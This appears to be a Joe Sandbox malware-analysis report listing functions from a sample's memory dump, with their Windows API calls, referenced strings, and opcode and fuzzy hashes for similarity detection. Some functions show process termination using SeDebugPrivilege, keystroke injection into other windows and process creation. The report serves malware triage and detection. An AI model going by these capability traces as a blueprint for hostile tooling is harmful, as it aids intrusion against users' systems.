Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d944903e33f2e8650bce1a8d360c74d461cb209e0419b4ce67ba3f7118c38630
Instruction ID: a8bfcf6db2995e7030a613b2b1fba7e20f19c789bb2a92a59ef27acc9f76638d
Opcode Fuzzy Hash: d944903e33f2e8650bce1a8d360c74d461cb209e0419b4ce67ba3f7118c38630
Instruction Fuzzy Hash: E271C371501205EFCF21CF68CC94ABA7BBAFF49350F14467AED555A2A6C7328C42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009EC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

Part of subcall function 00962344: GetCursorPos.USER32(?), ref: 00962357
Part of subcall function 00962344: ScreenToClient.USER32(00A267B0,?), ref: 00962374
Part of subcall function 00962344: GetAsyncKeyState.USER32(00000001), ref: 00962399
Part of subcall function 00962344: GetAsyncKeyState.USER32(00000002), ref: 009623A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 009EC2E4
ImageList_EndDrag.COMCTL32 ref: 009EC2EA
ReleaseCapture.USER32 ref: 009EC2F0
SetWindowTextW.USER32(?,00000000), ref: 009EC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009EC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 009EC48F

Strings

@GUI_DRAGFILE, xrefs: 009EC424
@GUI_DROPID, xrefs: 009EC3E1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: ee3567a7cd93e858ce4ba981f2f46ea0974eca7c65b466235970154328341c1a
Instruction ID: dd5494d87195c0ef89c8c65cfa4fa949968aeb3e5c754911f164b1cc5f70e89d
Opcode Fuzzy Hash: ee3567a7cd93e858ce4ba981f2f46ea0974eca7c65b466235970154328341c1a
Instruction Fuzzy Hash: 35518C70208384AFD710EF64C895FAA7BE5FB88314F004929F5958B2E1DB70AD46DB52

Uniqueness

Uniqueness Score: -1.00%

Function 009D8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,009EF910), ref: 009D903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009EF910), ref: 009D9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009D91EB
SysFreeString.OLEAUT32(?), ref: 009D9215

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7dbe93de79477118b0bdf246150615963b0600e52fd3a7552146590929da5d5f
Instruction ID: 71971d88ec5cc1dc8c7f118ffb80bc45efacea941ecdcc18188e36ef8ddcf1ae
Opcode Fuzzy Hash: 7dbe93de79477118b0bdf246150615963b0600e52fd3a7552146590929da5d5f
Instruction Fuzzy Hash: 37F12E71A40209EFDF04EF94C888EAEB7B9FF89314F10855AF516AB251DB31AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009DF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009DF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009DFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009DFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009DFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009DFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009DFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009DFD90
CloseHandle.KERNEL32(?), ref: 009DFDBF
CloseHandle.KERNEL32(?), ref: 009DFE36

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 1c07444947deb1510714bf70ee6932cb92eaa28cbbc66171e865250b7f9a674a
Instruction ID: 776ba49f2044a79f11dc566e9876ed2633ce1d479b2233d0fd7a001490c764bc
Opcode Fuzzy Hash: 1c07444947deb1510714bf70ee6932cb92eaa28cbbc66171e865250b7f9a674a
Instruction Fuzzy Hash: 7FE1A331244341DFCB14EF24C8A1B6ABBE5AF85354F14846EF89A9B3A2DB31DC45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C38D3,?), ref: 009C48C7

Part of subcall function 009C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C38D3,?), ref: 009C48E0

Part of subcall function 009C4CD3: GetFileAttributesW.KERNEL32(?,009C3947), ref: 009C4CD4

lstrcmpiW.KERNEL32(?,?), ref: 009C4FE2
_wcscmp.LIBCMT ref: 009C4FFC
MoveFileW.KERNEL32(?,?), ref: 009C5017

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: abaf6932b85d85b5611b589935efa0bd01e69591629d8c01a5ae81faddab965f
Instruction ID: 4dbf89aa724b9c855ca35eb56bab551557c1cb35e58ccc310355a8c58504d327
Opcode Fuzzy Hash: abaf6932b85d85b5611b589935efa0bd01e69591629d8c01a5ae81faddab965f
Instruction Fuzzy Hash: AF5152B25087859BC724EB90C895FDFB3ECAFC4341F00492EB589D7152EE74A6888766

Uniqueness

Uniqueness Score: -1.00%

Function 009E88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009E896E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3efdb292c197537ff07e37dfaba778c932a5f284ff363253bfd9bdeb7b5691d7
Instruction ID: 11c792446c6ed8c9f6efcd552e8c549948142d1af84ec03091435bebc7a68bf2
Opcode Fuzzy Hash: 3efdb292c197537ff07e37dfaba778c932a5f284ff363253bfd9bdeb7b5691d7
Instruction Fuzzy Hash: 2E51B6305002C8BFDF329FAACC85B6B3B69BB05310F504526F929E61E1DF71AD809B41

Uniqueness

Uniqueness Score: -1.00%

Function 00962B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0099C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0099C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0099C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0099C5C0
DestroyIcon.USER32(00000000), ref: 0099C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0099C5EC
DestroyIcon.USER32(?), ref: 0099C5FB

Part of subcall function 009EA71E: DeleteObject.GDI32(00000000), ref: 009EA757

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 70f8813ddc9f26df96fe63d1607612ca4f74b9472af8b3d1ea42eb8fcece37ec
Instruction ID: 27f2c32e3a9de7d045a1105e760c2e912cf0d03fb112f2818a023a27c6c50a75
Opcode Fuzzy Hash: 70f8813ddc9f26df96fe63d1607612ca4f74b9472af8b3d1ea42eb8fcece37ec
Instruction Fuzzy Hash: FA518C70A04609EFDF20DF28CC55FAA37B9EB55350F104529F9429B2A0DB74ED81EB50

Uniqueness

Uniqueness Score: -1.00%

Function 009B9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009BAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BAE77
Part of subcall function 009BAE57: GetCurrentThreadId.KERNEL32 ref: 009BAE7E
Part of subcall function 009BAE57: AttachThreadInput.USER32(00000000,?,009B9B65,?,00000001), ref: 009BAE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 009B9B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009B9B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009B9B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 009B9B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009B9BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009B9BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 009B9BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009B9BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009B9BDD

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: d9b6d85cb7e16906bcf8f82da0072518a8fdb68baa4d02773a30be78c8853019
Instruction ID: e7cba2aae9bb4c7e8c8fc1dd64ac2b049ea36d74497d76ae6294d44bb035b3c7
Opcode Fuzzy Hash: d9b6d85cb7e16906bcf8f82da0072518a8fdb68baa4d02773a30be78c8853019
Instruction Fuzzy Hash: E111C271564258BFF6106B60DC89FAA3B1DDB4DB65F100426F244AB0E0C9F25C10AAA4

Uniqueness

Uniqueness Score: -1.00%

Function 009B8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009B8A84,00000B00,?,?), ref: 009B8E0C
HeapAlloc.KERNEL32(00000000,?,009B8A84,00000B00,?,?), ref: 009B8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009B8A84,00000B00,?,?), ref: 009B8E28
GetCurrentProcess.KERNEL32(?,00000000,?,009B8A84,00000B00,?,?), ref: 009B8E30
DuplicateHandle.KERNEL32(00000000,?,009B8A84,00000B00,?,?), ref: 009B8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009B8A84,00000B00,?,?), ref: 009B8E43
GetCurrentProcess.KERNEL32(009B8A84,00000000,?,009B8A84,00000B00,?,?), ref: 009B8E4B
DuplicateHandle.KERNEL32(00000000,?,009B8A84,00000B00,?,?), ref: 009B8E4E
CreateThread.KERNEL32(00000000,00000000,009B8E74,00000000,00000000,00000000), ref: 009B8E68

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e7ac46b43057b553654a38dcc785af796a52b30edf76fbb2843b874fdd93be82
Instruction ID: 6d77b7fb9c3fe2ba9ff7cde233e7bd7635e0d536a3bed6c124c84f3d38256cb6
Opcode Fuzzy Hash: e7ac46b43057b553654a38dcc785af796a52b30edf76fbb2843b874fdd93be82
Instruction Fuzzy Hash: 8801AC75254348FFE610AB65DC8DF573B6CEB89711F018421FA05DF191CA709C00DA20

Uniqueness

Uniqueness Score: -1.00%

Function 009D9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009D947C
VariantInit.OLEAUT32(?), ref: 009D954D
VariantInit.OLEAUT32(?), ref: 009D964E
VariantClear.OLEAUT32(?), ref: 009D9658
VariantClear.OLEAUT32(?), ref: 009D96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 009D94DD, 009D960B, 009D96C3
Incorrect Object type in FOR..IN loop, xrefs: 009D9631

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: d93a4e30f811337ff0b1baa4ddd7580a0d068d7dda344aad9b5093300258923f
Instruction ID: 6277b014d2588b97d4092c7da179b3269c5e7c8ca70a953d6e632b53f1791d3b
Opcode Fuzzy Hash: d93a4e30f811337ff0b1baa4ddd7580a0d068d7dda344aad9b5093300258923f
Instruction Fuzzy Hash: A591BF70A40219AFDF20EFA5D848FAEBBB8EF85314F10855AF515AB290D770D941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 009B7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?,?,009B799D), ref: 009B766F
Part of subcall function 009B7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?), ref: 009B768A
Part of subcall function 009B7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?), ref: 009B7698
Part of subcall function 009B7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?), ref: 009B76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009D9B1B
_memset.LIBCMT ref: 009D9B28
_memset.LIBCMT ref: 009D9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009D9C97
CoTaskMemFree.OLE32(?), ref: 009D9CA2

Strings

NULL Pointer assignment, xrefs: 009D9CF0

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 933284d015495073d7ac1dacfb15547e77d4f78066ac544c36f78da8b4425175
Instruction ID: 948bb1ed99711aac31c506c5f520b5add5958d9ec10acc7922011203db32b73b
Opcode Fuzzy Hash: 933284d015495073d7ac1dacfb15547e77d4f78066ac544c36f78da8b4425175
Instruction Fuzzy Hash: DB912971D00219EBDB10EFA5DC85ADEBBB9BF48710F20815AF519A7281DB719A44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009E7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 009E70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009E70C1
_wcscat.LIBCMT ref: 009E711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 009E7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009E7161

Strings

SysListView32, xrefs: 009E7065

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: f9840dd3c7678264d43417f385b50d7ba938d3cdea7c20bd928b265b73281f3b
Instruction ID: 49e03473e198fbc316ef31240f0ae2a1b4e0322729f25d2010af96352b8f77d8
Opcode Fuzzy Hash: f9840dd3c7678264d43417f385b50d7ba938d3cdea7c20bd928b265b73281f3b
Instruction Fuzzy Hash: 4041C570904388BFEB229FA4CC85BEEB7ACEF48754F10042AF544E7292D6719D848B60

Uniqueness

Uniqueness Score: -1.00%

Function 009DEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 009C3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 009C3EB6
Part of subcall function 009C3E91: Process32FirstW.KERNEL32(00000000,?), ref: 009C3EC4
Part of subcall function 009C3E91: CloseHandle.KERNEL32(00000000), ref: 009C3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DECB8
GetLastError.KERNEL32 ref: 009DECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009DECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 009DED77
GetLastError.KERNEL32(00000000), ref: 009DED82
CloseHandle.KERNEL32(00000000), ref: 009DEDB7

Strings

SeDebugPrivilege, xrefs: 009DECD6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: f394517686dd68cd18e8a12a6785b0f06d9c34bcdd04f106a707502206157ff9
Instruction ID: c86785509f937cd0be231fc2e99f2949a3d9eeb8e15eac4c3ef05ea626b48f7d
Opcode Fuzzy Hash: f394517686dd68cd18e8a12a6785b0f06d9c34bcdd04f106a707502206157ff9
Instruction Fuzzy Hash: 76419C712442009FDB14EF24C8A5F6EB7A9AF84714F08C45AF8469F3D2DB75AC04DB96

Uniqueness

Uniqueness Score: -1.00%

Function 009C3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009C32C5

Strings

warning, xrefs: 009C32AE
info, xrefs: 009C3266
stop, xrefs: 009C3296
question, xrefs: 009C327E
blank, xrefs: 009C3247

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: eca813d8b1de63b54349255fdb2d55d27a89ac036a630a111c3353b8fa881bf8
Instruction ID: 36b2262a3218470f713a71ae12d2985673c4dbf729b0e6d0bdfcd0e41dac4767
Opcode Fuzzy Hash: eca813d8b1de63b54349255fdb2d55d27a89ac036a630a111c3353b8fa881bf8
Instruction Fuzzy Hash: F011EB31A0D346BAAF015A54DC52EAAB39CEF19B70F10C02EF51056281E6B95F4046A6

Uniqueness

Uniqueness Score: -1.00%

Function 009C4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009C454E
LoadStringW.USER32(00000000), ref: 009C4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009C456B
LoadStringW.USER32(00000000), ref: 009C4572
_wprintf.LIBCMT ref: 009C4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 009C4593

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 3bb3d66584e8c08c263a6d022a3dd01913ce3555e85a5185d962fb3419918a81
Instruction ID: f9884716a2f0448a4f82443d95b994efddd856cfe8a1ad6f62072d3da8a7323d
